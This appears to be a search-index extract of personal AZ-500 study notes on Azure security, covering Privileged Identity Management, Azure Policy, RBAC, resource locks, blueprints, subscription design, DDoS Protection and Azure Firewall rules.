                            Make sure there are always at least two users in a Privileged Role Administrator role, in case one user is locked out or their account is deleted.

                            When creating an assignment, something that I didn't know in the setting up: - Type of the assignment - Eligible assignments require the member of the role to perform an action to use the role. Actions might include activation or requesting approval from designated approvers. - Active assignments don't require the member to perform any action to use the role. Members assigned as active have the privileges assigned to the role.

                            How activates a role? If users have been made eligible for a role, then they must activate the role assignment before using the role. To activate the role, users select a specific activation duration within the maximum (configured by administrators) and the reason for the activation request. If the role requires approval to activate, a notification will appear in the upper right corner of the user's browser, informing them the request is pending approval. If approval isn't required, the member can start using the role. Delegated approvers receive email notifications when a role request is pending their approval. Approvers can view, approve or deny these pending requests in PIM. After the request has been approved, the member can start using the role. For example, if a user or a group was assigned with Contribution role to a resource group, they'll be able to manage that particular resource group.

                            To extend or renew assignments, it's required approval from a Global Administrator or Privileged Role Administrator. Notifications can be sent to Admins, Requestors, and Approvers.

                            Privileged Role Administrator permissions

                            • Enable approval for specific roles
                            • Specify approver users or groups to approve requests
                            • View request and approval history for all privileged roles

                            Approver permissions

                            • View pending approvals (requests)
                            • Approve or reject requests for role elevation (single and bulk)
                            • Provide justification for my approval or rejection

                            Eligible role user permissions

                            • Request activation of a role that requires approval
                            • View the status of your request to activate
                            • Complete your task in Azure AD if activation was approved

                            Assignment settings:

                            • Allow permanent eligible assignment. Global admins and Privileged role admins can assign permanent eligible assignment. They can also require that all eligible assignments have a specified start and end date.
                            • Allow permanent active assignment. Global admins and Privileged role admins can assign active eligible assignment. They can also require that all active assignments have a specified start and end date.

                            Implement a privileged identity management workflow

                            By configuring Azure AD PIM to manage our elevated access roles in Azure AD, we now have JIT access for more than 28 configurable privileged roles. We can also monitor access, audit account elevations, and receive additional alerts through a management dashboard in the Azure portal.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#5-design-an-enterprise-governance-strategy-azure-resource-manager","title":"5. Design an Enterprise Governance strategy: Azure Resource Manager","text":"

                            Regardless of the deployment type,\u00a0you always retain responsibility for the following:

                            • Data
                            • Endpoints
                            • Accounts
                            • Access management

                            Azure Resource Manager\u00a0is the deployment and management service for Azure. It provides a consistent management layer that allows you to create, update, and delete resources in your Azure subscription. You can use its access control, auditing, and tagging features to help secure and organize your resources after deployment.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#51-resource-groups","title":"5.1. Resource Groups","text":"

                            Resource Groups - There are some important factors to consider when defining your resource group:

                            • All the resources in your group should share the same lifecycle. You deploy, update, and delete them together. If one resource, such as a database server, needs to exist on a different deployment cycle it should be in another resource group.
                            • Each resource can only exist in one resource group.
                            • You can add or remove a resource to a resource group at any time.
                            • You can move a resource from one resource group to another group.
                            • A resource group can contain resources that are located in different regions.
                            • A resource group can be used to scope access control for administrative actions.
                            • A resource can interact with resources in other resource groups. This interaction is common when the two resources are related but don't share the same lifecycle (for example, web apps connecting to a database).
                            • If the resource group's region is temporarily unavailable, you can't update resources in the resource group because the metadata is unavailable. The resources in other regions will still function as expected, but you can't update them.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#52-management-groups","title":"5.2. Management Groups","text":"
                            • Provide user access to multiple subscriptions
                            • Allows for new organizational models and logically grouping of resources.
                            • Allows for single assignment of controls that applies to all subscriptions.
                            • Provides aggregated views above the subscription level.

                            Mirror your organization's structure - Create a flexible hierarchy that can be updated quickly. - The hierarchy does not need to model the organization's billing hierarchy. - The structure can easily scale up or down depending on your needs.

                            Apply policies or access controls to any service - Create one RBAC assignment on the management group, which will inherit that access to all the subscriptions. - Use Azure Resource Manager integrations that allow integrations with other Azure services: Azure Cost Management, Privileged Identity Management, and Microsoft Defender for Cloud.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#53-azure-policies","title":"5.3. Azure policies","text":"

                            Configure Azure policies - Azure Policy is a service you use to create, assign, and manage policies. These policies enforce different rules and effects over your resources so that those resources stay compliant with your corporate standards and service level agreements.

                            The\u00a0first pillar\u00a0is around\u00a0real-time enforcement and compliance assessment.

                            The\u00a0second pillar\u00a0of policy is\u00a0applying policies at scale\u00a0by leveraging Management Groups. There also is the concept called\u00a0policy initiative\u00a0that allows you to group policies together so that you can view the aggregated compliance result. At the initiative level there's also a concept called exclusion where one can exclude either the child management group, subscription, resource group, or resources from the policy assignment.

                            The\u00a0third pillar\u00a0of your policy is\u00a0remediation by leveraging a remediation policy\u00a0that will automatically remediate the non-compliant resource so that your environment always stays compliant. For existing resources, they will be flagged as non-compliant but they won't automatically be changed because there can be impact to the environment.

                            Some built-in roles in Azure Policy resources:

                            • Resource Policy Owner
                            • Resource Policy Contributor
                            • Resource Policy Reader

                            There are two resource providers for Azure Policy operations (or permissions):

                            • Microsoft.Authorization
                            • Microsoft.PolicyInsights

                            If a custom policy is needed these are the steps:

                            • Identify your business requirements
                            • Map each requirement to an Azure resource property
                            • Map the property to an alias
                            • Determine which effect to use
                            • Compose the policy definition

                            Let's do it:

                            • Policy definition\u00a0- Every policy definition has conditions under which it's enforced. And, it has a defined effect that takes place if the conditions are met.
                            • Policy assignment\u00a0- A policy definition that has been assigned to take place within a specific scope. This scope could range from a management group to an individual resource. The term scope refers to all the resources, resource groups, subscriptions, or management groups that the policy definition is assigned to.
                            • Policy parameters\u00a0- They help simplify your policy management by reducing the number of policy definitions you must create. You can define parameters when creating a policy definition to make it more generic.

                            In order to easily track compliance for multiple resources, create and assign an\u00a0Initiative definition.

                            All Policy objects, including definitions, initiatives, and assignments, will be readable to all roles over its scope. For example, a Policy assignment scoped to an Azure subscription will be readable by all role holders at the subscription scope and below.

                            A\u00a0contributor\u00a0may trigger resource remediation but can't create or update definitions and assignments.\u00a0User Access Administrator\u00a0is necessary to grant the managed identity on\u00a0deployIfNotExists\u00a0or\u00a0modify\u00a0the assignment's necessary permissions.

                            Each policy definition in Azure Policy has a single effect. That effect determines what happens when the policy rule is evaluated to match. The effects behave differently if they are for a new resource, an updated resource, or an existing resource.

                            These effects are currently supported in a policy definition:

                            • Append
                            • Audit
                            • AuditIfNotExists
                            • Deny
                            • DenyAction
                            • DeployIfNotExists
                            • Disabled
                            • Manual
                            • Modify
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#54-enable-role-based-access-control-rbac","title":"5.4. Enable Role-Based Access Control (RBAC)","text":"

                            RBAC is an authorization system built on Azure Resource Manager that provides fine-grained access management of Azure resources. Each Azure subscription is associated with one Azure AD directory. Users, groups, and applications in that directory can manage resources in the Azure subscription. Grant access by assigning the appropriate RBAC role to users, groups, and applications at a certain scope. The scope of a role assignment can be a subscription, a resource group, or a single resource.

                            Note that a subscription is associated with only one Azure AD tenant. Also note that a resource group can have multiple resources but is associated with only one subscription. Lastly, a resource can be bound to only one resource group.

                            The four general built-in roles are:

                            Built-in Role Description Contributor Grants full access to manage all resources, but does not allow you to assign roles in Azure RBAC, manage assignments in Azure Blueprints, or share image galleries. Owner Grants full access to manage all resources, including the ability to assign roles in Azure RBAC. Reader View all resources, but does not allow you to make any changes. User Access Administrator Lets you manage user access to Azure resources.

                            If the built-in roles for Azure resources don't meet the specific needs of your organization, you can create your own custom roles. Just like built-in roles, you can assign custom roles to users, groups, and service principals at management group, subscription, and resource group scopes.

                            Limits for custom roles.

                            • Each directory can have up to\u00a05000\u00a0custom roles.
                            • Azure Germany and Azure China 21Vianet can have up to 2000 custom roles for each directory.
                            • You cannot set AssignableScopes to the root scope (\"/\").
                            • You can only define one management group in AssignableScopes of a custom role. Adding a management group to AssignableScopes is currently in preview.
                            • Custom roles with DataActions cannot be assigned at the management group scope.
                            • Azure Resource Manager doesn't validate the management group's existence in the role definition's assignable scope.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#55-enable-resource-locks","title":"5.5. Enable resource locks","text":"

                            You can set the lock level to\u00a0CanNotDelete or ReadOnly. In the portal, the locks are called\u00a0Delete and Read-only\u00a0respectively.

                            • CanNotDelete\u00a0means authorized users can still read and modify a resource, but they can't delete the resource.
                            • ReadOnly\u00a0means authorized users can read a resource, but they can't delete or update the resource. Applying this lock is similar to restricting all authorized users to the permissions granted by the Reader role.

                            To create or delete management locks, you must have access to Microsoft.Authorization/*or\u00a0Microsoft.Authorization/locks/*\u00a0actions. Of the built-in roles, only\u00a0Owner\u00a0and\u00a0User Access Administrator\u00a0are granted those actions.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#56-deploy-azure-blueprints","title":"5.6. Deploy Azure blueprints","text":"

                            Blueprints are a declarative way to orchestrate the deployment of various resource templates and other artifacts, such as:

                            • Role Assignments
                            • Policy Assignments
                            • Azure Resource Manager templates
                            • Resource Groups

                            The Azure Blueprints service is supported by the globally distributed Azure Cosmos Data Base. Blueprint objects are replicated in multiple Azure regions. This replication provides\u00a0low latency,\u00a0high availability, and\u00a0consistent access\u00a0to your blueprint objects, regardless of which region Blueprints deploys your resources to.

                            The Azure Resource Manager template gets used for deployments of one or more Azure resources, but once those resources deploy, there's no active connection or relationship to the template. Blueprints save the relationship between the blueprint definition and the blueprint assignment. This connection supports improved tracking and auditing of deployments. Each blueprint can consist of zero or more Resource Manager template artifacts. This support means that previous efforts to develop and maintain a library of Resource Manager templates are reusable in Blueprints.

                            Blueprint definition - A blueprint is composed of\u00a0artifacts. Azure Blueprints currently supports the following resources as artifacts:

                            Resource Hierarchy options Description Resource Groups Subscription Create a new resource group for use by other artifacts within the blueprint. These placeholder resource groups enable you to organize resources exactly how you want them structured and provide a scope limiter for included policy and role assignment artifacts and ARM templates. ARM template Subscription, Resource Group Templates, including nested and linked templates, are used to compose complex environments. Example environments: a SharePoint farm, Azure Automation State Configuration, or a Log Analytics workspace. Policy Assignment Subscription, Resource Group Allows assignment of a policy or initiative to the subscription the blueprint is assigned to. The policy or initiative must be within the scope of the blueprint definition location. If the policy or initiative has parameters, these parameters are assigned at the creation of the blueprint or during blueprint assignment. Role Assignment Subscription, Resource Group Add an existing user or group to a built-in role to make sure the right people always have the right access to your resources. Role assignments can be defined for the entire subscription or nested to a specific resource group included in the blueprint.

                            Blueprint definition locations - When creating a blueprint definition, you'll define where the blueprint is saved. Blueprints can be saved to a\u00a0management group\u00a0or\u00a0subscription\u00a0that you have\u00a0Contributor access\u00a0to. If the location is a management group, the blueprint is available to assign to any child subscription of that management group.

                            Blueprint parameters - Blueprints can pass parameters to either a\u00a0policy/initiative\u00a0or an\u00a0ARM template. When adding either\u00a0artifact\u00a0to a blueprint, the author decides to provide a defined value for each blueprint assignment or to allow each blueprint assignment to provide a value at assignment time.

                            Assigning a blueprint definition to a management group means the assignment object exists in the management group. The deployment of artifacts still targets a subscription. To perform a management group assignment, the\u00a0Create\u00a0Or\u00a0Update REST API\u00a0must be used, and the request body must include a value for\u00a0properties.scope\u00a0to define the target subscription.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#57-design-an-azure-subscription-management-plan","title":"5.7. Design an Azure subscription management plan","text":"

                            Capturing subscription requirements and designing target subscriptions include several factors which are based on:

                            • environment type
                            • ownership and governance model
                            • organizational structure
                            • application portfolios

                            Organization and governance design considerations

                            • Subscriptions serve as boundaries for Azure Policy assignments. - For example, in the Payment Card Industry.
                            • Subscriptions serve as a scale unit so component workloads can scale within platform subscription limits.
                            • Subscriptions provide a management boundary for governance and isolation that clearly separates concerns.
                            • Create separate platform subscriptions for management (monitoring), connectivity, and identity when they're required.
                            • Use manual processes to limit Azure AD tenants to only Enterprise Agreement enrollment subscriptions.
                            • See the Azure subscription and reservation transfer hub for subscription transfers between Azure billing offers.

                            Quota and capacity design considerations

                            Azure regions might have a finite number of resources. As a result, available capacity and Stock-keeping units (SKUs) should be tracked for Azure adoptions involving a large number of resources.

                            • Consider limits and quotas within the Azure platform for each service your workloads require.
                            • Consider the availability of required SKUs within your chosen Azure regions.
                            • Consider that subscription quotas aren't capacity guarantees and are applied on a per-region basis.
                            • Consider reusing unused or decommissioned subscriptions.

                            Tenant transfer restriction design considerations

                            • Each Azure subscription is linked to a single Azure AD tenant, which acts as an identity provider (IdP) for your Azure subscription. The Azure AD tenant is used to authenticate users, services, and devices.
                            • The Azure AD tenant linked to your Azure subscription can be changed by any user with the required permissions.

                            Transferring to another Azure AD tenant is not supported for Azure Cloud Solution Provider (CSP) subscriptions.

                            • With Azure landing zones, you can set requirements to prevent users from transferring subscriptions to your organization's Azure AD tenant.\u00a0Review the process in Manage Azure subscription policies. Configure your subscription policy by providing a list of exempted users. Exempted users are permitted to bypass restrictions set in the policy. An exempted users list is not an Azure Policy. You can only specify individual user accounts as exempted users, not Azure AD groups.
                            • Consider whether users with Visual Studio/MSDN Azure subscriptions should be allowed to transfer their subscription to or from your Azure AD tenant.
                            • Tenant transfer settings are only configurable by users with the Azure AD Global Administrator role assigned.

                            • All users with access to Azure can view the policy defined for your Azure AD tenant.

                              • Users can't view your exempted users list.
                              • Users can view the global administrators within your Azure AD tenant.
                            • Azure subscriptions transferred into an Azure AD tenant are placed into the default management group for that tenant.

                            • If approved by your organization, your application team can define a process to allow Azure subscriptions to be transferred to or from an Azure AD tenant.

                            Establish cost management design considerations

                            • Cost transparency is a critical management challenge every large enterprise organization faces. T
                            • Chargeback models, like Azure App Service Environment and Azure Kubernetes Service, might need to be shared to achieve higher density. Shared\u00a0platform as a service (PaaS)\u00a0resources can be affected by Chargeback models.
                            • Use a shutdown schedule for nonproduction workloads to optimize costs.
                            • Use Azure Advisor to check recommendations for optimizing costs.
                            • Establish a charge back model for better distribution of cost across your organization.
                            • Implement policy to prevent the deployment of resources not authorized to be deployed in your organization's environment.
                            • Establish a regular schedule and cadence to review cost and right size resources for workloads.

                            Organization and governance recommendations

                            • Treat subscriptions as a unit of management aligned with your business needs and priorities.
                            • Make subscription owners aware of their roles and responsibilities.
                              • Do a quarterly or yearly access review for Azure AD Privileged Identity Management to ensure that privileges don't proliferate as users move within your organization.
                              • Take full ownership of budget spending and resources.
                              • Ensure policy compliance and remediate when necessary.
                            • Reference the following principles as you identify requirements for new subscriptions:
                              • Scale limits: Subscriptions serve as a scale unit for component workloads to scale within platform subscription limits. Large specialized workloads like\u00a0high-performance computing,\u00a0Internet of Things (IoT), and\u00a0System Analysis Program Development (SAP)\u00a0should use separate subscriptions to avoid running up against these limits.
                              • Management boundary: Subscriptions provide a management boundary for governance and isolation, allowing a clear separation of concerns. Different environments, such as development, test, and production, are often removed from a management perspective.
                              • Policy boundary: Subscriptions serve as a boundary for the Azure Policy assignments. For example, secure workloads like PCI typically require other policies in order to achieve compliance. The other overhead doesn't get considered if you use a separate subscription. Development environments have more relaxed policy requirements than production environments.
                              • Target network topology: You can't share virtual networks across subscriptions, but you can connect them with different technologies like\u00a0virtual network peering or\u00a0Azure ExpressRoute. When deciding if you need a new subscription, consider which workloads need to communicate with each other.
                            • Group subscriptions together under management groups, which are aligned with your management group structure and policy requirements. Grouping subscriptions ensures that subscriptions with the same set of policies and Azure role assignments all come from a management group.
                            • Establish a dedicated management subscription in your\u00a0Platform\u00a0management group to support global management capabilities like Azure Monitor Log Analytics workspaces and Azure Automation runbooks.
                            • Establish a dedicated identity subscription in your\u00a0Platform\u00a0management group to host Windows Server Active Directory domain controllers when necessary.
                            • Establish a dedicated connectivity subscription in your\u00a0Platform\u00a0management group to host an\u00a0Azure Virtual WAN hub,\u00a0private Domain Name System (DNS),\u00a0ExpressRoute circuit, and other networking resources. A dedicated subscription ensures that all your foundation network resources are billed together and isolated from other workloads.
                            • Avoid a rigid subscription model. Instead, use a set of flexible criteria to group subscriptions across your organization.

                            Quota and capacity recommendations

                            • Use subscriptions as scale units, and scale out resources and subscriptions as required. Your workload can then use the required resources for scaling out without hitting subscription limits in the Azure platform.
                            • Use reserved instances to manage capacity in some regions. Your workload can then have the required capacity for high demand resources in a specific region.
                            • Establish a dashboard with custom views to monitor used capacity levels, and set up alerts if capacity is approaching critical levels (90 percent CPU usage).
                            • Raise support requests for quota increases under subscription provisioning, such as for total available VM cores within a subscription. Ensure that your quota limits are set before your workloads exceed the default limits.
                            • Ensure that any required services and features are available within your chosen deployment regions.

                            Automation recommendations

                            • Build a Subscription vending process to automate the creation of Subscriptions for application teams via a request workflow as described in\u00a0Subscription vending.

                            Tenant transfer restriction recommendations

                            • Configure the following settings to prevent users from transferring Azure subscriptions to or from your Azure AD tenant:
                              • Set Subscription leaving Azure AD directory to Permit no one.
                              • Set Subscription entering Azure AD directory to Permit no one.
                            • Configure a limited list of exempted users.
                              • Include members from an Azure PlatformOps (platform operations) team.
                              • Include break-glass accounts in the list of exempted users.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/","title":"II. Platform protection","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            This entire sections is about implementing security with a defense in depth approach in mind.

                            • Azure Network Security Groups\u00a0can be used for basic layer 3 & 4 access controls between Azure Virtual Networks, their subnets, and the Internet.
                            • Application Security Groups\u00a0enable you to define fine-grained network security policies based on workloads, centralized on applications, instead of explicit IP addresses.
                            • Azure Web Application Firewall\u00a0and the\u00a0Azure Firewall\u00a0can be used for more advanced network access controls that require application layer support.
                            • Local Admin Password Solution (LAPS)\u00a0or a third-party Privileged Access Management can set strong local admin passwords and just in time access to them.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#1-perimeter-security","title":"1. Perimeter security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#11-azure-networking-components","title":"1.1. Azure networking components","text":"

                            Azure Virtual Networks are a key component of Azure security services. The Azure network infrastructure enables you to securely connect Azure resources to each other with virtual networks (VNets). A VNet is a representation of your own network in the cloud. A VNet is a logical isolation of the Azure cloud network dedicated to your subscription. You can connect VNets to your on-premises networks.

                            Azure supports\u00a0dedicated WAN link connectivity\u00a0to your on-premises network and an Azure Virtual Network with ExpressRoute. The link between Azure and your site uses a dedicated connection that does not go over the public Internet.

                            Virtual networks

                            Virtual networks in Azure are network overlays that you can use to configure and control the connectivity among Azure resources, such as VMs and load balancers. A virtual network is scoped to a single Azure region. Virtual networks are made up of subnets. A subnet is a range of IP addresses within your virtual network. Subnets, like virtual networks, are scoped to a single Azure region. You can implement multiple virtual networks within each Azure subscription and Azure region. Each virtual network is isolated from other virtual networks. For each virtual network you can: - Specify a custom private IP address space using public and private addresses. Azure assigns resources in a virtual network a private IP address from the address space that you assign. - Segment the virtual network into one or more subnets and allocate a portion of the virtual network's address space to each subnet. - Use Azure-provided name resolution, or specify your own DNS server, for use by resources in a virtual network.

                            IP addresses

                            VMs, Azure load balancers, and application gateways in a single virtual network require unique Internet Protocol (IP) addresses the same way that clients in an on-premises subnet do. This enables these resources to communicate with each other: - Private\u00a0- A private IP address is dynamically or statically allocated to a VM from the defined scope of IP addresses in the virtual network. VMs use these addresses to communicate with other VMs in the same or connected virtual networks through a gateway / Azure ExpressRoute connection. These private IP addresses, or non-routable IP addresses, conform to RFC 1918. - Public\u00a0- Public IP addresses, which allow Azure resources to communicate with external clients, are assigned directly at the virtual network adapter of the VM or to the load balancer. Public IP address can also be added to Azure-only virtual networks. All IP blocks in the virtual network will be routable only within the customer's network, and they won't be reachable from outside. Virtual network packets travel through the high-speed Azure backplane.

                            You can control the dynamic IP addresses assigned to VMs and cloud services within an Azure virtual network by specifying an IP addressing scheme.

                            Subnets

                            Each subnet contains a range of IP addresses that fall within the virtual network address space. Subnetting hides the details of internal network organization from external routers. Subnetting also segments the host within the network, making it easier to apply network security at the interconnections between subnets.

                            Network adapters

                            VMs communicate with other VMs and other resources on the network by using virtual network adapters. Virtual network adapters configure VMs with private and, optionally, public IP address. A VM can have more than one network adapter for different network configurations.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#12-azure-distributed-denial-of-service-ddos-protection","title":"1.2. Azure Distributed Denial of Service (DDoS) Protection","text":"

                            Best practices for building DDoS-resilient services in Azure:

                            1. Ensure that security is a priority throughout the entire lifecycle of an application, from design and implementation to deployment and operations. Applications might have bugs that allow a relatively low volume of requests to use a lot of resources, resulting in a service outage.

                            For this, take into account these pillars: - Scalability - The ability of a system to handle increased load. - Availability - The proportion of time that a system is functional and working. - Resiliency - The ability of a system to recover from failures and continue to function. - Management - Operations processes that keep a system running in production. - Security - Protecting applications and data from threats

                            2. Design your applications to scale horizontally to meet the demands of an amplified load\u2014specifically, in the event of a DDoS. If your application depends on a single instance of a service, it creates a single point of failure. Provisioning multiple instances makes your system more resilient and more scalable.

                            For this, these are valid ways to address it: - For Azure App Service, select an App Service plan that offers multiple instances. - For Azure Cloud Services, configure each of your roles to use multiple instances. - For Azure Virtual Machines, ensure that your VM architecture includes more than one VM and that each VM is included in an availability set. We recommend using virtual machine scale sets for autoscaling capabilities.

                            3. Layer security defenses in an application to reduce the chance of a successful attack. Implement security-enhanced designs for your applications by using the built-in capabilities of the Azure platform.

                            This would be an approach to address it: Be aware that the risk of attack increases with the size, or surface area, of the application. You can reduce the surface area by using IP allowlists to close down the exposed IP address space and listening ports that aren\u2019t needed on the load balancers (for Azure Load Balancer and Azure Application Gateway). \u200eYou can also use NSGs to reduce the attack surface. You can use service tags and application security groups as a natural extension of an application\u2019s structure to minimize complexity for creating security rules and configuring network security.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#configure-a-distributed-denial-of-service-protection-implementation","title":"Configure a distributed denial of service protection implementation","text":"

                            Azure Distributed Denial of Service (DDoS) protection, combined with application design best practices, provide defense against DDoS attacks. Azure DDoS protection provides the following service tiers:

                            • Basic: Automatically enabled as part of the Azure platform. Always-on traffic monitoring, and real-time mitigation of common network-level attacks, provide the same defenses utilized by Microsoft's online services. The entire scale of Azure's global network can be used to distribute and mitigate attack traffic across regions. Protection is provided for IPv4 and IPv6 Azure public IP addresses.
                            • Standard: Provides additional mitigation capabilities over the Basic service tier that are tuned specifically to Azure Virtual Network resources. DDoS Protection Standard is simple to enable, and requires no application changes. Protection policies are tuned through dedicated traffic monitoring and machine learning algorithms. Policies are applied to public IP addresses associated to resources deployed in virtual networks, such as Azure Load Balancer, Azure Application Gateway, and Azure Service Fabric instances, but this protection does not apply to App Service Environments. Real-time telemetry is available through Azure Monitor views during an attack, and for history. Rich attack mitigation analytics are available via diagnostic settings. Application layer protection can be added through the Azure Application Gateway Web Application Firewall or by installing a 3rd party firewall from Azure Marketplace. Protection is provided for IPv4 and IPv6 Azure public IP addresses.

                            DDoS Protection Standard monitors actual traffic utilization and constantly compares it against the thresholds defined in the DDoS policy. When the traffic threshold is exceeded, DDoS mitigation is automatically initiated. When traffic returns to a level below the threshold, the mitigation is removed. During mitigation, DDoS Protection redirects traffic sent to the protected resource and performs several checks, including: - Helping ensure that packets conform to internet specifications and aren\u2019t malformed. - Interacting with the client to determine if the traffic might be a spoofed packet (for example, using\u00a0SYN Auth\u00a0or\u00a0SYN Cookie\u00a0or dropping a packet for the source to retransmit it). - Using rate-limit packets if it can\u2019t perform any other enforcement meth

                            DDoS Protection blocks attack traffic and forwards the remaining traffic to its intended destination. Within a few minutes of attack detection, you\u2019ll be notified with Azure Monitor metrics. By configuring logging on DDoS Protection Standard telemetry, you can write the logs to available options for future analysis. Azure Monitor retains metric data for DDoS Protection Standard for 30 days.

                            DDoS Protection Standard can mitigate the following types of attacks:

                            • Volumetric attacks: The attack's goal is to flood the network layer with a substantial amount of seemingly legitimate traffic. It includes UDP floods, amplification floods, and other spoofed-packet floods. DDoS Protection Standard mitigates these potential multi-gigabyte attacks by absorbing and scrubbing them, with Azure's global network scale, automatically.
                            • Protocol attacks: These attacks render a target inaccessible, by exploiting a weakness in the layer 3 and layer 4 protocol stack. It includes, SYN flood attacks, reflection attacks, and other protocol attacks. DDoS Protection Standard mitigates these attacks, differentiating between malicious and legitimate traffic, by interacting with the client, and blocking malicious traffic.
                            • Resource (application) layer attacks: These attacks target web application packets, to disrupt the transmission of data between hosts. The attacks include HTTP protocol violations, SQL injection, cross-site scripting, and other layer 7 attacks. Use a Web Application Firewall, such as the Azure Application Gateway web application firewall, as well as DDoS Protection Standard to provide defense against these attacks. There are also third-party web application firewall offerings available in the Azure Marketplace.

                            DDoS Protection Standard protects resources in a virtual network including public IP addresses associated with virtual machines, load balancers, and application gateways. When coupled with the Application Gateway web application firewall, or a third-party web application firewall deployed in a virtual network with a public IP, DDoS Protection Standard can provide full layer 3 to layer 7 mitigation capability.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#13-azure-firewall","title":"1.3. Azure Firewall","text":"

                            Azure Firewall\u00a0is a managed, cloud-based network security service that protects your Azure Virtual Network resources. It\u2019s a fully stateful firewall-as-a-service with built-in high availability and unrestricted cloud scalability. By default, Azure Firewall blocks traffic.

                            • Built-in high availability\u00a0- Because high availability is built in, no additional load balancers are required and there\u2019s nothing you need to configure.
                            • Unrestricted cloud scalability\u00a0- Azure Firewall can scale up as much as you need, to accommodate changing network traffic flows so you don't need to budget for your peak traffic.
                            • Application Fully Qualified Domain Name (FQDN) filtering rules\u00a0- You can limit outbound HTTP/S traffic to a specified list of FQDNs, including wild cards. This feature does not require SSL termination.
                            • Network traffic filtering rules\u00a0- You can centrally create allow or deny network filtering rules by source and destination IP address, port, and protocol. Azure Firewall is fully stateful, so it can distinguish legitimate packets for different types of connections. Rules are enforced and logged across multiple subscriptions and virtual networks.
                            • Qualified domain tags\u00a0- Fully Qualified Domain Names (FQDN) tags make it easier for you to allow well known Azure service network traffic through your firewall. For example, say you want to allow Windows Update network traffic through your firewall. You create an application rule and include the Windows Update tag. Now network traffic from Windows Update can flow through your firewall.
                            • Outbound Source Network Address Translation (OSNAT) support\u00a0- All outbound virtual network traffic IP addresses are translated to the Azure Firewall public IP. You can identify and allow traffic originating from your virtual network to remote internet destinations.
                            • Inbound Destination Network Address Translation (DNAT) support\u00a0- Inbound network traffic to your firewall public IP address is translated and filtered to the private IP addresses on your virtual networks.
                            • Azure Monitor logging\u00a0- All events are integrated with Azure Monitor, allowing you to archive logs to a storage account, stream events to your Event Hub, or send them to Azure Monitor logs.

                            Flow of rules for inbound traffic: Grouping the features above into logical groups reveals that Azure Firewall has three rule types:\u00a0NAT rules,\u00a0network rules, and\u00a0application rules. Network rules are applied first, then application rules. Rules are terminating, which means if a match is found in network rules, then application rules are not processed. If there\u2019s no network rule match, and if the packet protocol is HTTP/HTTPS, the packet is then evaluated by the application rules. If no match continues to be found, then the packet is evaluated against the infrastructure rule collection. If there\u2019s still no match, then the packet is denied by default.

                            NAT rules - Inbound Destination Network Address Translation (DNAT). Filter inbound traffic with Azure Firewall DNAT using the Azure portal. DNAT rules are applied first. If a match is found, an implicit corresponding network rule to allow the translated traffic is added. You can override this behavior by explicitly adding a network rule collection with deny rules that match the translated traffic. No application rules are applied for these connections.

                            Network rules - Grant access from a virtual network. You can configure storage accounts to allow access only from specific VNets. You enable a service endpoint for Azure Storage within the VNet. This endpoint gives traffic an optimal route to the Azure Storage service. The identities of the virtual network and the subnet are also transmitted with each request. Administrators can then configure network rules for the storage account that allow requests to be received from specific subnets in the VNet. Each storage account supports up to 100 virtual network rules, which could be combined with IP network rules.

                            Application rules - Firewall rules to secure Azure Storage When network rules are configured, only applications requesting data from over the specified set of networks can access a storage account. An application that accesses a storage account when network rules are in effect requires proper authorization on the request. Authorization is supported with Azure AD credentials for blobs and queues, a valid account access key, or a SAS token. By default, storage accounts accept connections from clients on any network. To limit access to selected networks, you must first change the default action. Making changes to network rules can impact your applications' ability to connect to Azure Storage. Setting the default network rule to Deny blocks all access to the data unless specific network rules that grant access are also applied. Be sure to grant access to any allowed networks using network rules before you change the default rule to deny access.

                            Controlling outbound and inbound network access is an important part of an overall network security plan. Network traffic is subjected to the configured firewall rules when you route your network traffic to the firewall as the default gateway.

                            One way you can control outbound network access from an Azure subnet is with Azure Firewall. With Azure Firewall, you can configure:

                            • Application rules that define fully qualified domain names (FQDNs) that can be accessed from a subnet.
                            • Network rules that define source address, protocol, destination port, and destination address.

                            Fully Qualified Domain Name (FQDN) tag: An FQDN tag represents a group of fully qualified domain names (FQDNs) associated with well known Microsoft services. You can use an FQDN tag in application rules to allow the required outbound network traffic through your firewall.

                            Infrastructure qualified domain names: Azure Firewall includes a built-in rule collection for infrastructure FQDNs that are allowed by default. These FQDNs are specific for the platform and can't be used for other purposes. The following services are included in the built-in rule collection:

                            • Compute access to storage Platform Image Repository (PIR)
                            • Managed disks status storage access
                            • Azure Diagnostics and Logging (MDS)

